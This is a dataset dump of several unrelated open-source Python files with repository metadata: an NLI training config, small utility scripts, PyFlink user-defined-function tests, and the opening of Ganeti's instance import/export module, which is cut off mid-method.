[ "BSD-3-Clause" ]
null
null
null
import numpy import os from nli import train if __name__ == '__main__': model_name = os.path.basename(os.path.dirname(os.path.realpath(__file__))) train( saveto = './{}.npz'.format(model_name), reload_ = False, dim_word = 300, dim = 300, patience = 3, n_words = 2260, decay_c = 0., clip_c = 10., lrate = 0.0004, optimizer = 'adadelta', maxlen = 100, batch_size = 32, valid_batch_size = 32, dispFreq = 10, validFreq = 1000, saveFreq = 1000, use_dropout = True, verbose = False, datasets = ['../../data/word_sequence/premise_SICK_train.txt.tok', '../../data/word_sequence/hypothesis_SICK_train.txt.tok', '../../data/word_sequence/label_SICK_train.txt'], valid_datasets = ['../../data/word_sequence/premise_SICK_trial.txt.tok', '../../data/word_sequence/hypothesis_SICK_trial.txt.tok', '../../data/word_sequence/label_SICK_trial.txt'], test_datasets = ['../../data/word_sequence/premise_SICK_test_annotated.txt.tok', '../../data/word_sequence/hypothesis_SICK_test_annotated.txt.tok', '../../data/word_sequence/label_SICK_test_annotated.txt'], dictionary = '../../data/word_sequence/vocab_cased.pkl', # embedding = '../../data/glove/glove.840B.300d.txt', )
38.585366
90
0.529077
795a7d3140d84acc5d6ae0c35e5e706441210438
83
py
Python
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
src/dependency_injector/__init__.py
kootoopas/python-dependency-injector
47278030ce1b4e06b6d4b21af4d0ebbfa178c815
[ "BSD-3-Clause" ]
null
null
null
"""Top-level package.""" __version__ = '4.5.4' """Version number. :type: str """
10.375
24
0.590361
795a7e64235facb0a785a1e877d5ed0e6982eece
1,672
py
Python
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
examples/sklearn_example.py
petehellyer/BayesianOptimization
b79d5f174b930e94d12a480e936f2029d9468ca7
[ "MIT" ]
null
null
null
from __future__ import print_function from __future__ import division from sklearn.datasets import make_classification from sklearn.cross_validation import cross_val_score from sklearn.ensemble import RandomForestClassifier as RFC from sklearn.svm import SVC from bayes_opt import BayesianOptimization # Load data set and target values data, target = make_classification(n_samples=2500, n_features=45, n_informative=12, n_redundant=7) def svccv(C, gamma): return cross_val_score(SVC(C=C, gamma=gamma, random_state=2), data, target, 'f1', cv=5).mean() def rfccv(n_estimators, min_samples_split, max_features): return cross_val_score(RFC(n_estimators=int(n_estimators), min_samples_split=int(min_samples_split), max_features=min(max_features, 0.999), random_state=2), data, target, 'f1', cv=5).mean() if __name__ == "__main__": svcBO = BayesianOptimization(svccv, {'C': (0.001, 100), 'gamma': (0.0001, 0.1)}) svcBO.explore({'C': [0.001, 0.01, 0.1], 'gamma': [0.001, 0.01, 0.1]}) rfcBO = BayesianOptimization(rfccv, {'n_estimators': (10, 250), 'min_samples_split': (2, 25), 'max_features': (0.1, 0.999)}) svcBO.maximize() print('-'*53) rfcBO.maximize() print('-'*53) print('Final Results') print('SVC: %f' % svcBO.res['max']['max_val']) print('RFC: %f' % rfcBO.res['max']['max_val'])
38
84
0.572368
795a7f51aab69efedb248b9392679b2d9ca19fbf
566
py
Python
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
Silver/Silver_IV/1920.py
masterTyper/baekjoon_solved_ac
b9ce14d9bdaa5b5b06735ad075fb827de9f44b9c
[ "MIT" ]
null
null
null
import sys N = int(sys.stdin.readline()) A = list(map(int, sys.stdin.readline().split())) M = int(sys.stdin.readline()) E = list(map(int, sys.stdin.readline().split())) A.sort() def binary_search(target): start = 0 end = len(A) - 1 while start <= end: mid = (start + end) // 2 if A[mid] == target: return True elif A[mid] < target: start = mid + 1 else: end = mid - 1 return None for i in range(M): if binary_search(E[i]): print(1) else: print(0)
16.171429
48
0.512367
795a821baec697441c80d18eb0ed8ad2a2fe4ed7
430
py
Python
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
testkit/backend.py
mrhardikjoshi/neo4j-ruby-driver
b182011bbc3bca2c7c79e5917a87654bef0fbfde
[ "MIT" ]
null
null
null
""" Executed in Ruby driver container. Assumes driver and backend has been built. Responsible for starting the test backend. """ import os, subprocess if __name__ == "__main__": err = open("/artifacts/backenderr.log", "w") out = open("/artifacts/backendout.log", "w") subprocess.check_call( ['env', 'driver=%s' % os.environ.get("TEST_DRIVER_PLATFORM", 'ruby'), "bin/testkit-backend"], stdout=out, stderr=err)
33.076923
125
0.690698
795a826cc420f2e82a3c31d9a539f8612a6e1aa3
26,667
py
Python
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
2
2020-01-09T06:58:29.000Z
2020-01-09T06:58:32.000Z
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
1
2020-05-19T08:20:26.000Z
2020-05-19T08:20:26.000Z
flink-python/pyflink/table/tests/test_udf.py
zhangxiangyang/flink
e8ea52b90e3ac8cd30cb20a44394388a1ef21f0b
[ "Apache-2.0" ]
1
2020-03-06T22:58:05.000Z
2020-03-06T22:58:05.000Z
################################################################################ # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ################################################################################ from pyflink.table import DataTypes from pyflink.table.udf import ScalarFunction, udf from pyflink.testing import source_sink_utils from pyflink.testing.test_case_utils import PyFlinkStreamTableTestCase, \ PyFlinkBlinkStreamTableTestCase, PyFlinkBlinkBatchTableTestCase class UserDefinedFunctionTests(object): def test_scalar_function(self): # test lambda function self.t_env.register_function( "add_one", udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())) # test Python ScalarFunction self.t_env.register_function( "subtract_one", udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())) # test Python function self.t_env.register_function("add", add) # test callable function self.t_env.register_function( "add_one_callable", udf(CallablePlus(), DataTypes.BIGINT(), DataTypes.BIGINT())) def partial_func(col, param): return col + param # test partial function import functools self.t_env.register_function( "add_one_partial", udf(functools.partial(partial_func, param=1), DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd', 'e', 'f'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) t.where("add_one(b) <= 3") \ .select("add_one(a), subtract_one(b), add(a, c), add_one_callable(a), " "add_one_partial(a), a") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,1,4,2,2,1", "4,0,12,4,4,3"]) def test_chaining_scalar_function(self): self.t_env.register_function( "add_one", udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())) self.t_env.register_function( "subtract_one", udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())) self.t_env.register_function("add", add) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.INT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 1), (2, 5, 2), (3, 1, 3)], ['a', 'b', 'c']) t.select("add(add_one(a), subtract_one(b)), c, 1") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["3,1,1", "7,2,1", "4,3,1"]) def test_udf_in_join_condition(self): t1 = self.t_env.from_elements([(2, "Hi")], ['a', 'b']) t2 = self.t_env.from_elements([(2, "Flink")], ['c', 'd']) self.t_env.register_function("f", udf(lambda i: i, DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd'], [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.BIGINT(), DataTypes.STRING()]) self.t_env.register_table_sink("Results", table_sink) t1.join(t2).where("f(a) = c").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,Hi,2,Flink"]) def test_udf_in_join_condition_2(self): t1 = self.t_env.from_elements([(1, "Hi"), (2, "Hi")], ['a', 'b']) t2 = self.t_env.from_elements([(2, "Flink")], ['c', 'd']) self.t_env.register_function("f", udf(lambda i: i, DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd'], [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.BIGINT(), DataTypes.STRING()]) self.t_env.register_table_sink("Results", table_sink) t1.join(t2).where("f(a) = f(c)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2,Hi,2,Flink"]) def test_udf_with_constant_params(self): def udf_with_constant_params(p, null_param, tinyint_param, smallint_param, int_param, bigint_param, decimal_param, float_param, double_param, boolean_param, str_param, date_param, time_param, timestamp_param): from decimal import Decimal import datetime assert null_param is None, 'null_param is wrong value %s' % null_param assert isinstance(tinyint_param, int), 'tinyint_param of wrong type %s !' \ % type(tinyint_param) p += tinyint_param assert isinstance(smallint_param, int), 'smallint_param of wrong type %s !' \ % type(smallint_param) p += smallint_param assert isinstance(int_param, int), 'int_param of wrong type %s !' \ % type(int_param) p += int_param assert isinstance(bigint_param, int), 'bigint_param of wrong type %s !' \ % type(bigint_param) p += bigint_param assert decimal_param == Decimal('1.05'), \ 'decimal_param is wrong value %s ' % decimal_param p += int(decimal_param) assert isinstance(float_param, float) and float_equal(float_param, 1.23, 1e-06), \ 'float_param is wrong value %s ' % float_param p += int(float_param) assert isinstance(double_param, float) and float_equal(double_param, 1.98932, 1e-07), \ 'double_param is wrong value %s ' % double_param p += int(double_param) assert boolean_param is True, 'boolean_param is wrong value %s' % boolean_param assert str_param == 'flink', 'str_param is wrong value %s' % str_param assert date_param == datetime.date(year=2014, month=9, day=13), \ 'date_param is wrong value %s' % date_param assert time_param == datetime.time(hour=12, minute=0, second=0), \ 'time_param is wrong value %s' % time_param assert timestamp_param == datetime.datetime(1999, 9, 10, 5, 20, 10), \ 'timestamp_param is wrong value %s' % timestamp_param return p self.t_env.register_function("udf_with_constant_params", udf(udf_with_constant_params, input_types=[DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.TINYINT(), DataTypes.SMALLINT(), DataTypes.INT(), DataTypes.BIGINT(), DataTypes.DECIMAL(20, 10), DataTypes.FLOAT(), DataTypes.DOUBLE(), DataTypes.BOOLEAN(), DataTypes.STRING(), DataTypes.DATE(), DataTypes.TIME(), DataTypes.TIMESTAMP()], result_type=DataTypes.BIGINT())) self.t_env.register_function( "udf_with_all_constant_params", udf(lambda i, j: i + j, [DataTypes.BIGINT(), DataTypes.BIGINT()], DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink(['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) self.t_env.register_table("test_table", t) self.t_env.sql_query("select udf_with_all_constant_params(" "cast (1 as BIGINT)," "cast (2 as BIGINT)), " "udf_with_constant_params(a, " "cast (null as BIGINT)," "cast (1 as TINYINT)," "cast (1 as SMALLINT)," "cast (1 as INT)," "cast (1 as BIGINT)," "cast (1.05 as DECIMAL)," "cast (1.23 as FLOAT)," "cast (1.98932 as DOUBLE)," "true," "'flink'," "cast ('2014-09-13' as DATE)," "cast ('12:00:00' as TIME)," "cast ('1999-9-10 05:20:10' as TIMESTAMP))" " from test_table").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["3,8", "3,9", "3,10"]) def test_overwrite_builtin_function(self): self.t_env.register_function( "plus", udf(lambda i, j: i + j - 1, [DataTypes.BIGINT(), DataTypes.BIGINT()], DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink(['a'], [DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2, 3), (2, 5, 6), (3, 1, 9)], ['a', 'b', 'c']) t.select("plus(a, b)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["2", "6", "3"]) def test_open(self): self.t_env.register_function( "subtract", udf(Subtract(), DataTypes.BIGINT(), DataTypes.BIGINT())) table_sink = source_sink_utils.TestAppendSink( ['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2), (2, 5), (3, 4)], ['a', 'b']) t.select("a, subtract(b)").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["1,1", "2,4", "3,3"]) def test_udf_without_arguments(self): self.t_env.register_function("one", udf( lambda: 1, input_types=[], result_type=DataTypes.BIGINT(), deterministic=True)) self.t_env.register_function("two", udf( lambda: 2, input_types=[], result_type=DataTypes.BIGINT(), deterministic=False)) table_sink = source_sink_utils.TestAppendSink(['a', 'b'], [DataTypes.BIGINT(), DataTypes.BIGINT()]) self.t_env.register_table_sink("Results", table_sink) t = self.t_env.from_elements([(1, 2), (2, 5), (3, 1)], ['a', 'b']) t.select("one(), two()").insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() self.assert_equals(actual, ["1,2", "1,2", "1,2"]) def test_all_data_types(self): def boolean_func(bool_param): assert isinstance(bool_param, bool), 'bool_param of wrong type %s !' \ % type(bool_param) return bool_param def tinyint_func(tinyint_param): assert isinstance(tinyint_param, int), 'tinyint_param of wrong type %s !' \ % type(tinyint_param) return tinyint_param def smallint_func(smallint_param): assert isinstance(smallint_param, int), 'smallint_param of wrong type %s !' \ % type(smallint_param) assert smallint_param == 32767, 'smallint_param of wrong value %s' % smallint_param return smallint_param def int_func(int_param): assert isinstance(int_param, int), 'int_param of wrong type %s !' \ % type(int_param) assert int_param == -2147483648, 'int_param of wrong value %s' % int_param return int_param def bigint_func(bigint_param): assert isinstance(bigint_param, int), 'bigint_param of wrong type %s !' \ % type(bigint_param) return bigint_param def bigint_func_none(bigint_param): assert bigint_param is None, 'bigint_param %s should be None!' % bigint_param return bigint_param def float_func(float_param): assert isinstance(float_param, float) and float_equal(float_param, 1.23, 1e-6), \ 'float_param is wrong value %s !' % float_param return float_param def double_func(double_param): assert isinstance(double_param, float) and float_equal(double_param, 1.98932, 1e-7), \ 'double_param is wrong value %s !' % double_param return double_param def bytes_func(bytes_param): assert bytes_param == b'flink', \ 'bytes_param is wrong value %s !' % bytes_param return bytes_param def str_func(str_param): assert str_param == 'pyflink', \ 'str_param is wrong value %s !' % str_param return str_param def date_func(date_param): from datetime import date assert date_param == date(year=2014, month=9, day=13), \ 'date_param is wrong value %s !' % date_param return date_param def time_func(time_param): from datetime import time assert time_param == time(hour=12, minute=0, second=0, microsecond=123000), \ 'time_param is wrong value %s !' % time_param return time_param def timestamp_func(timestamp_param): from datetime import datetime assert timestamp_param == datetime(2018, 3, 11, 3, 0, 0, 123000), \ 'timestamp_param is wrong value %s !' % timestamp_param return timestamp_param def array_func(array_param): assert array_param == [[1, 2, 3]], \ 'array_param is wrong value %s !' % array_param return array_param[0] def map_func(map_param): assert map_param == {1: 'flink', 2: 'pyflink'}, \ 'map_param is wrong value %s !' % map_param return map_param def decimal_func(decimal_param): from decimal import Decimal assert decimal_param == Decimal('1000000000000000000.050000000000000000'), \ 'decimal_param is wrong value %s !' % decimal_param return decimal_param def decimal_cut_func(decimal_param): from decimal import Decimal assert decimal_param == Decimal('1000000000000000000.059999999999999999'), \ 'decimal_param is wrong value %s !' % decimal_param return decimal_param self.t_env.register_function( "boolean_func", udf(boolean_func, [DataTypes.BOOLEAN()], DataTypes.BOOLEAN())) self.t_env.register_function( "tinyint_func", udf(tinyint_func, [DataTypes.TINYINT()], DataTypes.TINYINT())) self.t_env.register_function( "smallint_func", udf(smallint_func, [DataTypes.SMALLINT()], DataTypes.SMALLINT())) self.t_env.register_function( "int_func", udf(int_func, [DataTypes.INT()], DataTypes.INT())) self.t_env.register_function( "bigint_func", udf(bigint_func, [DataTypes.BIGINT()], DataTypes.BIGINT())) self.t_env.register_function( "bigint_func_none", udf(bigint_func_none, [DataTypes.BIGINT()], DataTypes.BIGINT())) self.t_env.register_function( "float_func", udf(float_func, [DataTypes.FLOAT()], DataTypes.FLOAT())) self.t_env.register_function( "double_func", udf(double_func, [DataTypes.DOUBLE()], DataTypes.DOUBLE())) self.t_env.register_function( "bytes_func", udf(bytes_func, [DataTypes.BYTES()], DataTypes.BYTES())) self.t_env.register_function( "str_func", udf(str_func, [DataTypes.STRING()], DataTypes.STRING())) self.t_env.register_function( "date_func", udf(date_func, [DataTypes.DATE()], DataTypes.DATE())) self.t_env.register_function( "time_func", udf(time_func, [DataTypes.TIME(3)], DataTypes.TIME(3))) self.t_env.register_function( "timestamp_func", udf(timestamp_func, [DataTypes.TIMESTAMP()], DataTypes.TIMESTAMP())) self.t_env.register_function( "array_func", udf(array_func, [DataTypes.ARRAY(DataTypes.ARRAY(DataTypes.BIGINT()))], DataTypes.ARRAY(DataTypes.BIGINT()))) self.t_env.register_function( "map_func", udf(map_func, [DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING())], DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING()))) self.t_env.register_function( "decimal_func", udf(decimal_func, [DataTypes.DECIMAL(38, 18)], DataTypes.DECIMAL(38, 18))) self.t_env.register_function( "decimal_cut_func", udf(decimal_cut_func, [DataTypes.DECIMAL(38, 18)], DataTypes.DECIMAL(38, 18))) table_sink = source_sink_utils.TestAppendSink( ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q'], [DataTypes.BIGINT(), DataTypes.BIGINT(), DataTypes.TINYINT(), DataTypes.BOOLEAN(), DataTypes.SMALLINT(), DataTypes.INT(), DataTypes.FLOAT(), DataTypes.DOUBLE(), DataTypes.BYTES(), DataTypes.STRING(), DataTypes.DATE(), DataTypes.TIME(3), DataTypes.TIMESTAMP(), DataTypes.ARRAY(DataTypes.BIGINT()), DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING()), DataTypes.DECIMAL(38, 18), DataTypes.DECIMAL(38, 18)]) self.t_env.register_table_sink("Results", table_sink) import datetime import decimal t = self.t_env.from_elements( [(1, None, 1, True, 32767, -2147483648, 1.23, 1.98932, bytearray(b'flink'), 'pyflink', datetime.date(2014, 9, 13), datetime.time(hour=12, minute=0, second=0, microsecond=123000), datetime.datetime(2018, 3, 11, 3, 0, 0, 123000), [[1, 2, 3]], {1: 'flink', 2: 'pyflink'}, decimal.Decimal('1000000000000000000.05'), decimal.Decimal('1000000000000000000.05999999999999999899999999999'))], DataTypes.ROW( [DataTypes.FIELD("a", DataTypes.BIGINT()), DataTypes.FIELD("b", DataTypes.BIGINT()), DataTypes.FIELD("c", DataTypes.TINYINT()), DataTypes.FIELD("d", DataTypes.BOOLEAN()), DataTypes.FIELD("e", DataTypes.SMALLINT()), DataTypes.FIELD("f", DataTypes.INT()), DataTypes.FIELD("g", DataTypes.FLOAT()), DataTypes.FIELD("h", DataTypes.DOUBLE()), DataTypes.FIELD("i", DataTypes.BYTES()), DataTypes.FIELD("j", DataTypes.STRING()), DataTypes.FIELD("k", DataTypes.DATE()), DataTypes.FIELD("l", DataTypes.TIME(3)), DataTypes.FIELD("m", DataTypes.TIMESTAMP()), DataTypes.FIELD("n", DataTypes.ARRAY(DataTypes.ARRAY(DataTypes.BIGINT()))), DataTypes.FIELD("o", DataTypes.MAP(DataTypes.BIGINT(), DataTypes.STRING())), DataTypes.FIELD("p", DataTypes.DECIMAL(38, 18)), DataTypes.FIELD("q", DataTypes.DECIMAL(38, 18))])) t.select("bigint_func(a), bigint_func_none(b)," "tinyint_func(c), boolean_func(d)," "smallint_func(e),int_func(f)," "float_func(g),double_func(h)," "bytes_func(i),str_func(j)," "date_func(k),time_func(l)," "timestamp_func(m),array_func(n)," "map_func(o),decimal_func(p)," "decimal_cut_func(q)") \ .insert_into("Results") self.t_env.execute("test") actual = source_sink_utils.results() # Currently the sink result precision of DataTypes.TIME(precision) only supports 0. self.assert_equals(actual, ["1,null,1,true,32767,-2147483648,1.23,1.98932," "[102, 108, 105, 110, 107],pyflink,2014-09-13," "12:00:00,2018-03-11 03:00:00.123,[1, 2, 3]," "{1=flink, 2=pyflink},1000000000000000000.050000000000000000," "1000000000000000000.059999999999999999"]) # decide whether two floats are equal def float_equal(a, b, rel_tol=1e-09, abs_tol=0.0): return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol) class PyFlinkStreamUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkStreamTableTestCase): pass class PyFlinkBlinkStreamUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkBlinkStreamTableTestCase): def test_deterministic(self): add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertTrue(add_one._deterministic) add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT(), deterministic=False) self.assertFalse(add_one._deterministic) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertTrue(subtract_one._deterministic) with self.assertRaises(ValueError, msg="Inconsistent deterministic: False and True"): udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT(), deterministic=False) self.assertTrue(add._deterministic) @udf(input_types=DataTypes.BIGINT(), result_type=DataTypes.BIGINT(), deterministic=False) def non_deterministic_udf(i): return i self.assertFalse(non_deterministic_udf._deterministic) def test_name(self): add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertEqual("<lambda>", add_one._name) add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT(), name="add_one") self.assertEqual("add_one", add_one._name) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT()) self.assertEqual("SubtractOne", subtract_one._name) subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT(), name="subtract_one") self.assertEqual("subtract_one", subtract_one._name) self.assertEqual("add", add._name) @udf(input_types=DataTypes.BIGINT(), result_type=DataTypes.BIGINT(), name="named") def named_udf(i): return i self.assertEqual("named", named_udf._name) def test_abc(self): class UdfWithoutEval(ScalarFunction): def open(self, function_context): pass with self.assertRaises( TypeError, msg="Can't instantiate abstract class UdfWithoutEval with abstract methods eval"): UdfWithoutEval() def test_invalid_udf(self): class Plus(object): def eval(self, col): return col + 1 with self.assertRaises( TypeError, msg="Invalid function: not a function or callable (__call__ is not defined)"): # test non-callable function self.t_env.register_function( "non-callable-udf", udf(Plus(), DataTypes.BIGINT(), DataTypes.BIGINT())) class PyFlinkBlinkBatchUserDefinedFunctionTests(UserDefinedFunctionTests, PyFlinkBlinkBatchTableTestCase): pass @udf(input_types=[DataTypes.BIGINT(), DataTypes.BIGINT()], result_type=DataTypes.BIGINT()) def add(i, j): return i + j class SubtractOne(ScalarFunction): def eval(self, i): return i - 1 class Subtract(ScalarFunction): def __init__(self): self.subtracted_value = 0 def open(self, function_context): self.subtracted_value = 1 def eval(self, i): return i - self.subtracted_value class CallablePlus(object): def __call__(self, col): return col + 1 if __name__ == '__main__': import unittest try: import xmlrunner testRunner = xmlrunner.XMLTestRunner(output='target/test-reports') except ImportError: testRunner = None unittest.main(testRunner=testRunner, verbosity=2)
45.045608
99
0.562305
795a83a9b9918a8db1196bbebad79714932c1d29
48,773
py
Python
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
lib/masterd/instance.py
apyrgio/snf-ganeti
c59bb92f5bf4a98d90b4f10fb509a5a2f11c65b7
[ "BSD-2-Clause" ]
null
null
null
# # # Copyright (C) 2010, 2011 Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Instance-related functions and classes for masterd. """ import logging import time import OpenSSL from ganeti import constants from ganeti import errors from ganeti import compat from ganeti import utils from ganeti import objects from ganeti import netutils from ganeti import pathutils class _ImportExportError(Exception): """Local exception to report import/export errors. """ class ImportExportTimeouts(object): #: Time until daemon starts writing status file DEFAULT_READY_TIMEOUT = 10 #: Length of time until errors cause hard failure DEFAULT_ERROR_TIMEOUT = 10 #: Time after which daemon must be listening DEFAULT_LISTEN_TIMEOUT = 10 #: Progress update interval DEFAULT_PROGRESS_INTERVAL = 60 __slots__ = [ "error", "ready", "listen", "connect", "progress", ] def __init__(self, connect, listen=DEFAULT_LISTEN_TIMEOUT, error=DEFAULT_ERROR_TIMEOUT, ready=DEFAULT_READY_TIMEOUT, progress=DEFAULT_PROGRESS_INTERVAL): """Initializes this class. @type connect: number @param connect: Timeout for establishing connection @type listen: number @param listen: Timeout for starting to listen for connections @type error: number @param error: Length of time until errors cause hard failure @type ready: number @param ready: Timeout for daemon to become ready @type progress: number @param progress: Progress update interval """ self.error = error self.ready = ready self.listen = listen self.connect = connect self.progress = progress class ImportExportCbBase(object): """Callbacks for disk import/export. """ def ReportListening(self, ie, private, component): """Called when daemon started listening. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object @param component: transfer component name """ def ReportConnected(self, ie, private): """Called when a connection has been established. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ def ReportProgress(self, ie, private): """Called when new progress information should be reported. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ def ReportFinished(self, ie, private): """Called when a transfer has finished. @type ie: Subclass of L{_DiskImportExportBase} @param ie: Import/export object @param private: Private data passed to import/export object """ class _DiskImportExportBase(object): MODE_TEXT = None def __init__(self, lu, node_uuid, opts, instance, component, timeouts, cbs, private=None): """Initializes this class. @param lu: Logical unit instance @type node_uuid: string @param node_uuid: Node UUID for import @type opts: L{objects.ImportExportOptions} @param opts: Import/export daemon options @type instance: L{objects.Instance} @param instance: Instance object @type component: string @param component: which part of the instance is being imported @type timeouts: L{ImportExportTimeouts} @param timeouts: Timeouts for this import @type cbs: L{ImportExportCbBase} @param cbs: Callbacks @param private: Private data for callback functions """ assert self.MODE_TEXT self._lu = lu self.node_uuid = node_uuid self.node_name = lu.cfg.GetNodeName(node_uuid) self._opts = opts.Copy() self._instance = instance self._component = component self._timeouts = timeouts self._cbs = cbs self._private = private # Set master daemon's timeout in options for import/export daemon assert self._opts.connect_timeout is None self._opts.connect_timeout = timeouts.connect # Parent loop self._loop = None # Timestamps self._ts_begin = None self._ts_connected = None self._ts_finished = None self._ts_cleanup = None self._ts_last_progress = None self._ts_last_error = None # Transfer status self.success = None self.final_message = None # Daemon status self._daemon_name = None self._daemon = None @property def recent_output(self): """Returns the most recent output from the daemon. """ if self._daemon: return 